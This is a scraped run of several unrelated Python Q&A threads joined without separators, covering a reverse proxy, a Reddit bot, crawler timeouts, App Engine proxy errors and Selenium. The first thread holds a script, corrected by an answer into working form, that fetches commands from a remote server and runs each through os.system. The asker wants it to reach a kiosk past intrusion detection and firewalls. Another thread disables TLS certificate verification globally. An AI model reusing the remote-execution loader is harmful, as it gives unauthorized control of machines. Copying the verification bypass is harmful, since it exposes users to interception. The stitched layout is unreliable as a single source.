I have a script that is supposed to read a text file from a remote server and then execute whatever is in that file.
For example, if the text file contains the command "ls", the computer will run it and list the directory.
Also, please don't suggest urllib2 or the like; I want to stick with Python 3.x.
As soon as I run it I get this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
data = urllib.request.urlopen(IP_Address)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
raise ValueError("unknown url type: %r" % self.full_url)
ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import os
import urllib.request
IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
    print("####")
    os.system(line)
Edit:
Yes, I realize this is a bad idea. It is a school project; we are playing red team and are supposed to get access to a kiosk. I figured that instead of writing code to get around intrusion detection and firewalls, it would be easier to execute commands from a remote server. Thanks for the help, everyone!
The error occurs because your URL does not include a protocol. Include "http://" (or "https://" if you're using SSL/TLS) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
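For example, a minimal corrected sketch of the script (keeping the os.system approach; note that urlopen yields bytes on Python 3, so each line is decoded before being handed to the shell):

import os
import urllib.request

url = "http://domain.com/test.txt"  # note the explicit scheme

with urllib.request.urlopen(url) as data:
    for line in data:
        print("####")
        # decode bytes -> str and strip the trailing newline before executing
        os.system(line.decode().strip())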
Try
"http://domain.com/test.txt"
or, if the file is hosted locally, "http://localhost/test.txt" (in which case you need to run an HTTP server on localhost).
I need a simple reverse proxy for Python 3.
I like Twisted and its simple reverse HTTP proxy (http://twistedmatrix.com/documents/14.0.1/_downloads/reverse-proxy.py) ...
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This example demonstrates how to run a reverse proxy.
Run this example with:
$ python reverse-proxy.py
Then visit http://localhost:8080/ in your web browser.
"""
from twisted.internet import reactor
from twisted.web import proxy, server
site = server.Site(proxy.ReverseProxyResource('www.yahoo.com', 80, ''))
reactor.listenTCP(8080, site)
reactor.run()
... but it throws an error in Python 3.
Unhandled Error
Traceback (most recent call last):
File "/usr/local/lib/python3.4/dist-packages/twisted/protocols/basic.py", line 571, in dataReceived
why = self.lineReceived(line)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/http.py", line 1752, in lineReceived
self.allContentReceived()
File "/usr/local/lib/python3.4/dist-packages/twisted/web/http.py", line 1845, in allContentReceived
req.requestReceived(command, path, version)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/http.py", line 766, in requestReceived
self.process()
--- <exception caught here> ---
File "/usr/local/lib/python3.4/dist-packages/twisted/web/server.py", line 185, in process
resrc = self.site.getResourceFor(self)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/server.py", line 791, in getResourceFor
return resource.getChildForRequest(self.resource, request)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/resource.py", line 98, in getChildForRequest
resource = resource.getChildWithDefault(pathElement, request)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/resource.py", line 201, in getChildWithDefault
return self.getChild(path, request)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/proxy.py", line 278, in getChild
self.host, self.port, self.path + b'/' + urlquote(path, safe=b"").encode('utf-8'),
builtins.TypeError: Can't convert 'bytes' object to str implicitly
Is there something similar that works in Python 3?
Having stumbled into this problem myself, I was disappointed to find no answer here. After some digging, I was able to get it working by changing the path argument of proxy.ReverseProxyResource to bytes rather than str, yielding the following line:
site = server.Site(proxy.ReverseProxyResource("www.yahoo.com", 80, b''))
This is necessary because Twisted appends a trailing slash as bytes (i.e. b'/') internally.
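Putting it together, the full example from above with that one change should run under Python 3:

from twisted.internet import reactor
from twisted.web import proxy, server

# Same reverse proxy as before; the path is passed as bytes (b'') so
# Twisted's internal bytes concatenation works on Python 3.
site = server.Site(proxy.ReverseProxyResource('www.yahoo.com', 80, b''))
reactor.listenTCP(8080, site)
reactor.run()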
I found this package on PyPI; it seems to work well and is similarly simple.
https://pypi.python.org/pypi/maproxy
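For reference, here is a minimal usage sketch along the lines of the package's README (reproduced from memory, so double-check it against the PyPI page; maproxy is a Tornado-based TCP proxy, and the host and ports below are just placeholders):

import tornado.ioloop
import maproxy.proxyserver

# Forward connections on local port 81 to www.example.com:80.
server = maproxy.proxyserver.ProxyServer("www.example.com", 80)
server.listen(81)
tornado.ioloop.IOLoop.instance().start()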
I'm trying to write a Reddit bot; I decided to start with a simple one to make sure I was doing things properly, and I got a RequestException.
my code (bot.py):
import praw
for s in praw.Reddit('bot1').subreddit("learnpython").hot(limit=5):
    print s.title
my praw.ini file:
[DEFAULT]
# The URL prefix for OAuth-related requests.
oauth_url=https://oauth.reddit.com
# The URL prefix for regular requests.
reddit_url=https://www.reddit.com
# The URL prefix for short URLs.
short_url=https://redd.it
[bot1]
client_id=HIDDEN
client_secret=HIDDEN
password=HIDDEN
username=HIDDEN
user_agent=ILovePythonBot0.1
(where HIDDEN replaces the actual id, secret, password and username.)
my Traceback:
Traceback (most recent call last):
File "bot.py", line 3, in <module>
for s in praw.Reddit('bot1').subreddit("learnpython").hot(limit=5):
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 79, in next
return self.__next__()
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 52, in __next__
self._next_batch()
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 62, in _next_batch
self._listing = self._reddit.get(self.url, params=self.params)
File "/usr/local/lib/python2.7/dist-packages/praw/reddit.py", line 322, in get
data = self.request('GET', path, params=params)
File "/usr/local/lib/python2.7/dist-packages/praw/reddit.py", line 406, in request
params=params)
File "/usr/local/lib/python2.7/dist-packages/prawcore/sessions.py", line 131, in request
params=params, url=url)
File "/usr/local/lib/python2.7/dist-packages/prawcore/sessions.py", line 70, in _request_with_retries
params=params)
File "/usr/local/lib/python2.7/dist-packages/prawcore/rate_limit.py", line 28, in call
response = request_function(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/prawcore/requestor.py", line 48, in request
raise RequestException(exc, args, kwargs)
prawcore.exceptions.RequestException: error with request request() got an unexpected keyword argument 'json'
Any help would be appreciated. P.S. I am using Python 2.7 on Ubuntu 14.04. Please ask me for any other information you may need.
The way I see it, you have a problem with your request to the Reddit API. Try changing the user agent in your praw.ini configuration. According to the PRAW basic configuration options, the user agent should follow the format <platform>:<app ID>:<version string> (by /u/<reddit username>). Try that and see what happens.
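For instance, a conforming user agent can also be passed straight to praw.Reddit instead of praw.ini; all the credential values below are placeholders:

import praw

# user_agent follows <platform>:<app ID>:<version string> (by /u/<username>)
reddit = praw.Reddit(client_id="HIDDEN",
                     client_secret="HIDDEN",
                     username="HIDDEN",
                     password="HIDDEN",
                     user_agent="linux:ilovepythonbot:v0.1 (by /u/yourusername)")
for s in reddit.subreddit("learnpython").hot(limit=5):
    print(s.title)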
I have a Python script that downloads product feeds from multiple affiliates in different ways. This didn't give me any problems until last Wednesday, when it started throwing all kinds of timeout exceptions from different locations.
Examples: here I connect to an FTP service:
ftp = FTP(host=self.host)
threw:
Exception in thread Thread-7:
Traceback (most recent call last):
File "C:\Python27\Lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\Lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\LDLC.py", line 23, in main
ftp = FTP(host=self.host)
File "C:\Python27\Lib\ftplib.py", line 120, in __init__
self.connect(host)
File "C:\Python27\Lib\ftplib.py", line 138, in connect
self.welcome = self.getresp()
File "C:\Python27\Lib\ftplib.py", line 215, in getresp
resp = self.getmultiline()
File "C:\Python27\Lib\ftplib.py", line 201, in getmultiline
line = self.getline()
File "C:\Python27\Lib\ftplib.py", line 186, in getline
line = self.file.readline(self.maxline + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
timeout: timed out
Or downloading an XML file:
xmlFile = urllib.URLopener()
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
xmlFile.close()
throws:
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\FeedCrawler.py", line 106, in save
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
File "C:\Python27\Lib\urllib.py", line 240, in retrieve
fp = self.open(url, data)
File "C:\Python27\Lib\urllib.py", line 208, in open
return getattr(self, name)(url)
File "C:\Python27\Lib\urllib.py", line 346, in open_http
errcode, errmsg, headers = h.getreply()
File "C:\Python27\Lib\httplib.py", line 1139, in getreply
response = self._conn.getresponse()
File "C:\Python27\Lib\httplib.py", line 1067, in getresponse
response.begin()
File "C:\Python27\Lib\httplib.py", line 409, in begin
version, status, reason = self._read_status()
File "C:\Python27\Lib\httplib.py", line 365, in _read_status
line = self.fp.readline(_MAXLINE + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
IOError: [Errno socket error] timed out
These are just two examples; there are other places, like authentication calls or other API-specific methods, where my script throws these timeout errors. It never showed this behavior until Wednesday. It also starts throwing them at random times: sometimes at the beginning of the crawl, sometimes later on. My script behaves this way on both my server and my local machine. I've been struggling with it for two days now but can't seem to figure it out.
Here is what I know might have caused this:
On Wednesday one affiliate script broke down with the following error:
URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:581)>
I didn't change anything in my script, but suddenly it stopped crawling that affiliate and threw that error every time I tried to authenticate. I looked it up and found that it was due to an OpenSSL error (where did that come from?). I fixed it by adding the following before the authenticate method:
import ssl

if hasattr(ssl, '_create_unverified_context'):
    ssl._create_default_https_context = ssl._create_unverified_context
Little did I know, this was just the start of my problems... At that same time, I changed from Python 2.7.8 to Python 2.7.9. It seems that this is the moment everything broke down and started throwing timeouts.
I tried changing my script in endless ways, but nothing worked, and as I said, it's not just one method that throws them. I also switched back to Python 2.7.8, but that didn't do the trick either. Basically, everything that makes a request to an external source can throw an error.
Final note: my script is multi-threaded. It downloads product feeds from different affiliates at the same time. It used to run 10 threads per affiliate without a problem. I tried lowering it to 3 per affiliate, but it still throws these errors. Setting it to 1 is not an option because that would take ages. I don't think that's the problem anyway, because it used to work fine.
What could be wrong?
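One thing worth ruling out when debugging a problem like this: does an explicit, generous timeout plus a simple retry change the picture? A minimal sketch for the FTP case (the host name is a placeholder):

import socket
from ftplib import FTP

def connect_with_retries(host, retries=3, timeout=60):
    # Retry transient connection timeouts a few times before giving up.
    for attempt in range(retries):
        try:
            return FTP(host=host, timeout=timeout)
        except (socket.timeout, IOError):
            if attempt == retries - 1:
                raise

ftp = connect_with_retries("ftp.example.com")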
After updating from 1.7.5 (where everything worked fine) I'm getting an HTTP Error 403: Forbidden when trying to open any site via localhost. The strange thing is that I have pretty much the same setup at home as here at work, and everything works there... It might be an issue with the proxy server we're using at work, since that's the only difference I can think of. Here's the error log I'm getting, so if anyone knows what's going on, please help (;
Traceback (most recent call last):
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 1302, in communicate
req.respond()
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 831, in respond
self.server.gateway(self).respond()
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 2115, in respond
response = self.req.server.wsgi_app(self.env, self.start_response)
File "U:\Dev\GAE\google\appengine\tools\devappserver2\wsgi_server.py", line 246, in __call__
return app(environ, start_response)
File "U:\Dev\GAE\google\appengine\tools\devappserver2\request_rewriter.py", line 311, in _rewriter_middleware
response_body = iter(application(environ, wrapped_start_response))
File "U:\Dev\GAE\google\appengine\tools\devappserver2\python\request_handler.py", line 89, in __call__
self._flush_logs(response.get('logs', []))
File "U:\Dev\GAE\google\appengine\tools\devappserver2\python\request_handler.py", line 220, in _flush_logs
apiproxy_stub_map.MakeSyncCall('logservice', 'Flush', request, response)
File "U:\Dev\GAE\google\appengine\api\apiproxy_stub_map.py", line 94, in MakeSyncCall
return stubmap.MakeSyncCall(service, call, request, response)
File "U:\Dev\GAE\google\appengine\api\apiproxy_stub_map.py", line 320, in MakeSyncCall
rpc.CheckSuccess()
File "U:\Dev\GAE\google\appengine\api\apiproxy_rpc.py", line 156, in _WaitImpl
self.request, self.response)
File "U:\Dev\GAE\google\appengine\ext\remote_api\remote_api_stub.py", line 200, in MakeSyncCall
self._MakeRealSyncCall(service, call, request, response)
File "U:\Dev\GAE\google\appengine\ext\remote_api\remote_api_stub.py", line 226, in _MakeRealSyncCall
encoded_response = self._server.Send(self._path, encoded_request)
File "U:\Dev\GAE\google\appengine\tools\appengine_rpc.py", line 393, in Send
f = self.opener.open(req)
File "U:\Dev\Python\lib\urllib2.py", line 410, in open
response = meth(req, response)
File "U:\Dev\Python\lib\urllib2.py", line 523, in http_response
'http', request, response, code, msg, hdrs)
File "U:\Dev\Python\lib\urllib2.py", line 448, in error
return self._call_chain(*args)
File "U:\Dev\Python\lib\urllib2.py", line 382, in _call_chain
result = func(*args)
File "U:\Dev\Python\lib\urllib2.py", line 531, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 403: Forbidden
INFO 2013-04-19 12:28:52,576 server.py:561] default: "GET / HTTP/1.1" 500 -
INFO 2013-04-19 12:28:52,619 server.py:561] default: "GET /favicon.ico HTTP/1.1" 304 -
Also, the launcher throws an error when closing:
Traceback (most recent call last):
File "launcher\mainframe.pyc", line 327, in OnStop
File "launcher\taskcontroller.pyc", line 167, in Stop
File "launcher\dev_appserver_task_thread.pyc", line 82, in stop
File "launcher\taskthread.pyc", line 107, in stop
File "launcher\platform.pyc", line 397, in KillProcess
pywintypes.error: (5, 'TerminateProcess', 'Access is denied.')
I had this very same issue on Mac OS X when using a proxy server with Google App Engine Launcher 1.8.6. Apparently there's an issue with proxy_bypass in urllib2.py.
There are two possible solutions:
Downgrade to 1.7.5, but who wants to downgrade?
Edit "[GAE installation path]/google/appengine/tools/appengine_rpc.py" and look for the line that says
opener.add_handler(fancy_urllib.FancyProxyHandler())
On my computer it was line 578. Put a hash (#) at the beginning of the line, like this:
#opener.add_handler(fancy_urllib.FancyProxyHandler())
Save the file, then stop and restart your application. Now dev_appserver.py shouldn't try to use any proxy server at all.
If your application uses any external resources, like a SOAP web service or something similar, and you can't reach the server without the proxy, then you'll have to downgrade. Keep in mind that external JavaScript files (like the Facebook SDK) are loaded by your browser, not by your application.
Since I'm not using any external REST or SOAP services, it worked for me!
Hopefully it will work for you as well.
Try either:
- accessing it through a different proxy, i.e. a proxy within a proxy;
- accessing it through your local IP, e.g. 192.168.1.1.
I faced the same issue with version 1.9.5. It seems that the API proxy is sending some RPCs to the proxy server, which are then rejected with HTTP 403 (since proxy servers are generally configured to reject connection attempts on arbitrary ports). In my case I was using the urlfetch module in my app to access external web pages, so disabling the proxy server was not an option for me.
This is how I worked around the issue some time back (most probably it was based on comments found under this issue, but I cannot remember the exact sources).
NOTE:
For this approach to work, you'll have to know the hostname/IP address and default port of your proxy server, and change them appropriately in the code if you happen to connect to a different proxy server.
When you are not behind the proxy server, you will have to revert the applied changes in order to return to a working state (if you want internet access inside your app).
Here it goes:
Disable proxy settings for the Python (Google App Engine Launcher) environment in some way. (In my case it was easy since I was launching the dev_appserver.py from a Terminal shell (on Linux), and the unset http_proxy and unset https_proxy commands did the trick.)
Edit {App Engine SDK root}/google/appengine/api/urlfetch_stub.py. Find the code block
if _CONNECTION_SUPPORTS_TIMEOUT:
  connection = connection_class(host, timeout=deadline)
else:
  connection = connection_class(host)
(lines 376-379 in my case) and replace it with:
if _CONNECTION_SUPPORTS_TIMEOUT:
  if host[:9] == 'localhost' or host[:9] == '127.0.0.1':
    connection = connection_class(host, timeout=deadline)
  else:
    connection = connection_class('your_proxy_host_goes_here',
                                  your_proxy_port_number_goes_here,
                                  timeout=deadline)
else:
  if host[:9] == 'localhost' or host[:9] == '127.0.0.1':
    connection = connection_class(host)
  else:
    connection = connection_class('your_proxy_host_goes_here',
                                  your_proxy_port_number_goes_here)
replacing the placeholders your_proxy_host_goes_here and your_proxy_port_number_goes_here with appropriate values.
(I believe this code can be written more elegantly, though... any Python geeks out there? :) )
In my case, I also had to delete the existing compiled file urlfetch_stub.pyc (located in the same directory as urlfetch_stub.py) because the SDK didn't seem to pick up the changes until I did so.
Now you can use dev_appserver to launch your app, and use urlfetch-backed services within the app, free from HTTP 403 errors.
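As a quick sanity check that the patch took effect, a urlfetch call from inside a handler should now return without a 403 (the URL here is just an example):

from google.appengine.api import urlfetch

# This now goes out through the configured proxy instead of failing with 403.
result = urlfetch.fetch("http://www.example.com/")
print(result.status_code)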
I've been using urllib2 to access web pages, but it doesn't support JavaScript, so I took a look at Selenium, but I'm quite confused even after reading its docs.
I downloaded the Selenium IDE add-on for Firefox and tried some simple things.
from selenium import selenium
import unittest, time, re

class test(unittest.TestCase):
    def setUp(self):
        self.verificationErrors = []
        self.selenium = selenium("localhost", 4444, "*chrome", "http://www.wikipedia.org/")
        self.selenium.start()

    def test_test(self):
        sel = self.selenium
        sel.open("/")
        sel.type("searchInput", "pacific ocean")
        sel.click("go")
        sel.wait_for_page_to_load("30000")

    def tearDown(self):
        self.selenium.stop()
        self.assertEqual([], self.verificationErrors)

if __name__ == "__main__":
    unittest.main()
I just access wikipedia.org and type "pacific ocean" into the search field, but when I run it, it gives me a lot of errors.
If running the script results in an [Errno 111] Connection refused error such as this:
% test.py
E
======================================================================
ERROR: test_test (__main__.test)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/unutbu/pybin/test.py", line 11, in setUp
self.selenium.start()
File "/data1/unutbu/pybin/selenium.py", line 189, in start
result = self.get_string("getNewBrowserSession", [self.browserStartCommand, self.browserURL, self.extensionJs])
File "/data1/unutbu/pybin/selenium.py", line 219, in get_string
result = self.do_command(verb, args)
File "/data1/unutbu/pybin/selenium.py", line 207, in do_command
conn.request("POST", "/selenium-server/driver/", body, headers)
File "/usr/lib/python2.6/httplib.py", line 898, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.6/httplib.py", line 935, in _send_request
self.endheaders()
File "/usr/lib/python2.6/httplib.py", line 892, in endheaders
self._send_output()
File "/usr/lib/python2.6/httplib.py", line 764, in _send_output
self.send(msg)
File "/usr/lib/python2.6/httplib.py", line 723, in send
self.connect()
File "/usr/lib/python2.6/httplib.py", line 704, in connect
self.timeout)
File "/usr/lib/python2.6/socket.py", line 514, in create_connection
raise error, msg
error: [Errno 111] Connection refused
----------------------------------------------------------------------
Ran 1 test in 0.063s
FAILED (errors=1)
then the solution is most likely that you need to get the Selenium server running first.
In the download for Selenium RC you will find a file called selenium-server.jar (as of a few months ago, that file was located at SeleniumRC/selenium-server-1.0.3/selenium-server.jar).
On Linux, you could run the Selenium server in the background with the command
java -jar /path/to/selenium-server.jar 2>/dev/null 1>&2 &
You will find more complete instructions on how to set up the server here.
I would suggest using WebDriver; you can find it here: http://code.google.com/p/selenium/downloads/list. If you want to write tests as a coder (and not with your mouse), it works better than the RC version you're trying to use, if only because it doesn't require a Selenium RC server instance. You simply drive a browser binary, or one already installed on your system, for example Firefox.
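For example, a rough WebDriver equivalent of the RC test above might look like this (the element locators are assumptions carried over from the RC script, so adjust them to the live page):

from selenium import webdriver

driver = webdriver.Firefox()
driver.get("http://www.wikipedia.org/")
# Same locators the RC script used: the search box and the "go" button.
search = driver.find_element_by_id("searchInput")
search.send_keys("pacific ocean")
driver.find_element_by_name("go").click()
driver.quit()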
I faced this issue in my project and found that the problem was a few webdriver.get calls with a very small time interval between them. My fix was not to add a delay but to remove the unneeded calls, and the error disappeared. Hope this helps somebody.